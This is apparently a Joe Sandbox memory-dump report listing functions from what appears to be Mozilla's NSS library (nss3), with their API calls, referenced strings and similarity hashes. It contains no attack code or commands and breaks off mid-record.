Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 910b5f04c5658d2a7c6bcdffb4e9ec05e7506f7d81e12587005183456d1c0507
Instruction ID: 8d55e7ada1fe9a4165ecbfa615111e6440001337f35339bc4fda02b97ba43977
Opcode Fuzzy Hash: 910b5f04c5658d2a7c6bcdffb4e9ec05e7506f7d81e12587005183456d1c0507
Instruction Fuzzy Hash: E631FAB2B016115BEB109BE6888C75737FCAB7735CF018119EB158B641F3B69416CBE1

Function 6CC42E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC42F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CC42FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CC43005
memcpy.VCRUNTIME140(?,?,?), ref: 6CC430EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC43131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC43178

Strings

database corruption, xrefs: 6CC4316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC43022, 6CC43156, 6CC43162, 6CC4318A, 6CC43196, 6CC431A2, 6CC431AE, 6CC431BA, 6CC431C6
%s at line %d of [%.10s], xrefs: 6CC43171

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 57e3a49f237fe02c319a916853ab09586b6afb955a443893b334518ae5c7ed14
Instruction ID: 49c578a5dc99c64081c26b91efdf3c73437c4c3cf2b925486d5b9e19c90d9f1e
Opcode Fuzzy Hash: 57e3a49f237fe02c319a916853ab09586b6afb955a443893b334518ae5c7ed14
Instruction Fuzzy Hash: E0B19FB0E05215DBDB18CF9DC885AEEB7B1BF88304F18C169E845B7B41E3759946CBA0

Function 6CCD6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CCD6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD6CA3

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CCD6CD5

Strings

hSession = 0x%x, xrefs: 6CCD6C7E, 6CCD6C8E
C_DigestInit, xrefs: 6CCD6C61
(CK_INVALID_HANDLE), xrefs: 6CCD6C9C
pMechanism = 0x%p, xrefs: 6CCD6CD0

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 0d184948fceb45bfb23d393fecc06d673fb54383bbe03b5234c66f5ab3db6b6d
Instruction ID: b8c8891a4fa6adfe914da46abf554102d3d8d12134826cbc03d9d9c53975a58b
Opcode Fuzzy Hash: 0d184948fceb45bfb23d393fecc06d673fb54383bbe03b5234c66f5ab3db6b6d
Instruction Fuzzy Hash: BB213971B00104AFEB009F55ED48B5A37B5EB82319F064429E509A7B62EB35A81CC7E2

Function 6CCA0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CCA0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CCA0F84

Part of subcall function 6CCFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CDD18D0,?), ref: 6CCFB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6CCBF59B,6CDC890C,?), ref: 6CCA0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CCA0FC1

Part of subcall function 6CD00BE0: malloc.MOZGLUE(6CCF8D2D,?,00000000,?), ref: 6CD00BF8
Part of subcall function 6CD00BE0: TlsGetValue.KERNEL32(6CCF8D2D,?,00000000,?), ref: 6CD00C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CCA0FDB
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCA0FEF
PL_FreeArenaPool.NSS3(?), ref: 6CCA1001
PL_FinishArenaPool.NSS3(?), ref: 6CCA1009

Strings

security, xrefs: 6CCA0F5C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 7ae992c86ed379cf87d9a88eb2285f56aa5666b2675f4dfa689b33bb72a3d0db
Instruction ID: 9055f7844a9da6365180a9789bb8e9ab51544f272b2cd0fe96fe5260cea64a94
Opcode Fuzzy Hash: 7ae992c86ed379cf87d9a88eb2285f56aa5666b2675f4dfa689b33bb72a3d0db
Instruction Fuzzy Hash: 332104B1A04204ABE7009F29DC81AAF77B8EF4835CF148518FC1897611FB31E55ACBE2

Function 6CCA6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CCA7D8F,6CCA7D8F,?,?), ref: 6CCA6DC8

Part of subcall function 6CCFFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CCFFE08
Part of subcall function 6CCFFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CCFFE1D
Part of subcall function 6CCFFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CCFFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CCA7D8F,?,?), ref: 6CCA6DD5

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CDC8FA0,00000000,?,?,?,?,6CCA7D8F,?,?), ref: 6CCA6DF7

Part of subcall function 6CCFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CDD18D0,?), ref: 6CCFB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CCA6E35

Part of subcall function 6CCFFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CCFFE29
Part of subcall function 6CCFFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CCFFE3D
Part of subcall function 6CCFFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CCFFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CCA6E4C

Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CDC8FE0,00000000), ref: 6CCA6E82

Part of subcall function 6CCA6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CCAB21D,00000000,00000000,6CCAB219,?,6CCA6BFB,00000000,?,00000000,00000000,?,?,?,6CCAB21D), ref: 6CCA6B01
Part of subcall function 6CCA6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CCA6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CCA6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CCA6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CDC8FE0,00000000), ref: 6CCA6F6B
PR_SetError.NSS3(FFFFE005,00000000,6CCA7D8F,?,?), ref: 6CCA6FE1

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: e1a145402b30c637961cce2ef3f9afd8d79ccd60942b5723ad7086923d3fb701
Instruction ID: 290116e082c0813a84903f59b5e383260151a78233cb8fd0da60575a27645e03
Opcode Fuzzy Hash: e1a145402b30c637961cce2ef3f9afd8d79ccd60942b5723ad7086923d3fb701
Instruction Fuzzy Hash: 43717F71E106479FEB00CF59CD44BAABBA4BF98308F154229E818D7B11F770E996CB90

Function 6CCE0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCE1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCE1085
PK11_GetAllTokens.NSS3 ref: 6CCE10B1
free.MOZGLUE(?), ref: 6CCE1107
PR_SetError.NSS3(00000000,00000000), ref: 6CCE1172
free.MOZGLUE(?), ref: 6CCE1182
free.MOZGLUE(?), ref: 6CCE11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CCE11C5

Part of subcall function 6CCE52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CCBEAC5,00000001), ref: 6CCE52DF
Part of subcall function 6CCE52C0: EnterCriticalSection.KERNEL32(?), ref: 6CCE52F3
Part of subcall function 6CCE52C0: PR_Unlock.NSS3(?), ref: 6CCE5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CCE11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CCE11F3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 6efffd036fb1e769ee668e5bc907d553ed47170876e006b0f6f53a98b2bfc851
Instruction ID: 0c6dc508c03de5b86f68286b9197b45180dd5cfa7263e69901fb4cbcdc1c901a
Opcode Fuzzy Hash: 6efffd036fb1e769ee668e5bc907d553ed47170876e006b0f6f53a98b2bfc851
Instruction Fuzzy Hash: 326196B0E003459BEB00DF69D881B9EB7B5BF49348F144128ED19AB742F731E965CB61

Function 6CCEADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE10
EnterCriticalSection.KERNEL32(?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CCCD079,00000000,00000001), ref: 6CCEAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE7F
TlsGetValue.KERNEL32(?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEF1
free.MOZGLUE(6CCCCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCCCDBB,?), ref: 6CCEAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAF30

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: c95ce1615bac3549a5838ccdc5486773ed20ad11fa67c63f4394c8fa970e5d01
Instruction ID: 71d0084f58f384ef5168b813a92348842f93252b90bbd0d049142dc4bbb33fea
Opcode Fuzzy Hash: c95ce1615bac3549a5838ccdc5486773ed20ad11fa67c63f4394c8fa970e5d01
Instruction Fuzzy Hash: 52519EB5A00601AFEB01DF29D884B56BBB4FF8A318F144665E91897E11F731E8B4CBD1

Function 6CCC4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CCCAB7F,?,00000000,?), ref: 6CCC4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CCCAB7F,?,00000000,?), ref: 6CCC4CC8
TlsGetValue.KERNEL32(?,6CCCAB7F,?,00000000,?), ref: 6CCC4CE0
EnterCriticalSection.KERNEL32(?,?,6CCCAB7F,?,00000000,?), ref: 6CCC4CF4
PL_HashTableLookup.NSS3(?,?,?,6CCCAB7F,?,00000000,?), ref: 6CCC4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CCC4D10

Part of subcall function 6CD4DD70: TlsGetValue.KERNEL32 ref: 6CD4DD8C
Part of subcall function 6CD4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CD4DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CCC4D26

Part of subcall function 6CD69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CDB0A27), ref: 6CD69DC6
Part of subcall function 6CD69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CDB0A27), ref: 6CD69DD1
Part of subcall function 6CD69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CD69DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CCC4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CCC4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CCC4E02

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 8cd7b3ddb8ee968bbd2643400223177301cef72d31596627729a5bb9a25486b9
Instruction ID: d0238b524aa9fef7974f78484100df66fae4df17299824a54f6363f210e10280
Opcode Fuzzy Hash: 8cd7b3ddb8ee968bbd2643400223177301cef72d31596627729a5bb9a25486b9
Instruction Fuzzy Hash: AD41A6B5B002059BEB11AF69EC4096677B8BF16358F0581B0ED18D7B11FB31E968C7E2

Function 6CCA2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CCA2CDA,?,00000000), ref: 6CCA2E1E

Part of subcall function 6CCFFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CCA9003,?), ref: 6CCFFD91
Part of subcall function 6CCFFD80: PORT_Alloc_Util.NSS3(A4686CD0,?), ref: 6CCFFDA2
Part of subcall function 6CCFFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CD0,?,?), ref: 6CCFFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CCA2E33

Part of subcall function 6CCFFD80: free.MOZGLUE(00000000,?,?), ref: 6CCFFDD1

TlsGetValue.KERNEL32 ref: 6CCA2E4E
EnterCriticalSection.KERNEL32(?), ref: 6CCA2E5E
PL_HashTableLookup.NSS3(?), ref: 6CCA2E71
PL_HashTableRemove.NSS3(?), ref: 6CCA2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CCA2E96
PR_Unlock.NSS3 ref: 6CCA2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CCA2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CCA2EC5

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 1457f9a54c15a7653a53f26a2e4908d6a22d51eb0dfc911fd15393caa66d3bf4
Instruction ID: eddad7c289c1e49d97f4f85009b0638e6c60fe9226bd57268b4c6400290cbfba
Opcode Fuzzy Hash: 1457f9a54c15a7653a53f26a2e4908d6a22d51eb0dfc911fd15393caa66d3bf4
Instruction Fuzzy Hash: E521F576A00201ABEF111B65EC0DA9B3AB8EB5235DF044034EE1C96B51F733C5BAC6E1

Function 6CC2CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CC2B999), ref: 6CC2CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CC2B999), ref: 6CC2D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CC2B999), ref: 6CC2D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CC2B999), ref: 6CD7972B

Strings

database corruption, xrefs: 6CC2CFE7, 6CC2D013, 6CC2D028, 6CC2D039, 6CC2D03E, 6CD79786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC2CFDD, 6CC2D00E, 6CC2D022, 6CC2D033, 6CD79780
%s at line %d of [%.10s], xrefs: 6CC2CFEC, 6CC2D018, 6CC2D029, 6CC2D03F, 6CD7978B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 945e97b2fbf17e4751a52c627df27770c0e8e661bebc49fd2405b9e8be8015fd
Instruction ID: 2c35584d02774762ab03e6458fc1b46a60a6a978b03655b3204cca851738c736
Opcode Fuzzy Hash: 945e97b2fbf17e4751a52c627df27770c0e8e661bebc49fd2405b9e8be8015fd
Instruction Fuzzy Hash: FE614C71A042109BD320CF29C840BA6B7F5EF55319F5981ADE4449FB92E37AE847C7E1

Function 6CD2EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6CD4A4A1,?,00000000,?,00000001), ref: 6CD2EF6D

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

htonl.WSOCK32(00000000,?,6CD4A4A1,?,00000000,?,00000001), ref: 6CD2EFE4
htonl.WSOCK32(?,00000000,?,6CD4A4A1,?,00000000,?,00000001), ref: 6CD2EFF1
memcpy.VCRUNTIME140(?,?,6CD4A4A1,?,00000000,?,6CD4A4A1,?,00000000,?,00000001), ref: 6CD2F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CD4A4A1,?,00000000,?,00000001), ref: 6CD2F027

Strings

dtls13, xrefs: 6CD2EF33

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 2a888c37b57299548786eba51d57121dd48ef4c237a32db38d2260fe09d4eae7
Instruction ID: 5e9e957c0cbdbfdb3ce11981acc001684edae5229b41ce33928fa314f096cd4c
